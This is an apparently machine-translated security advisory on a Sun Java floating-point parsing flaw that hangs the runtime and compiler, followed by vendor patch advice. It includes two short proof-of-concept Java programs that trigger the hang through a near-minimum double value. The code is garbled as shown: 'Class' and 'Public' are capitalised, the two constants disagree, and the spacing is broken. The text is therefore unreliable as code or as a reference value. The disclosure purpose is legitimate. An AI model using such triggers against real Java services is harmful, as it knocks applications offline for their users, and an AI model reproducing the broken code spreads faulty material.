Sun Java floating point Denial of Service Vulnerability

Release date:
Updated on:

Affected Systems:
Sun JRE 1.3.1-1.6 _ 17
Description:
--------------------------------------------------------------------------------
The Java Runtime Environment (JRE) provides a reliable runtime environment for JAVA applications.

Sun Java has a remote denial-of-service vulnerability. Remote attackers can exploit this vulnerability to cause suspension of applications written in Java and DOS.

This vulnerability is caused by "correction loop" in FloatingDecimal. java ".

<* Source: Konstantin Preisser
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Konstantin Preisser () provides the following test methods:

Send a Java Program Into An Infinite Loop

Compile this program and run it; the program will hang (at least it does on a 32-bit system with the latest JRE/JDK ):

Class runhang {
Public static void main (String [] args ){
System. out. println ("Test :");
Double d = Double. parseDouble ("2.225074255072012e-308 ");
System. out. println ("Value:" + d );
}
}

Send the Java Compiler Into An Infinite Loop

Try to compile this program; the compiler will hang:

Class compilehang {
Public static void main (String [] args ){
Double d = 2.2250738585072012e-308;
System. out. println ("Value:" + d );
}
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Sun
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://sunsolve.sun.com/security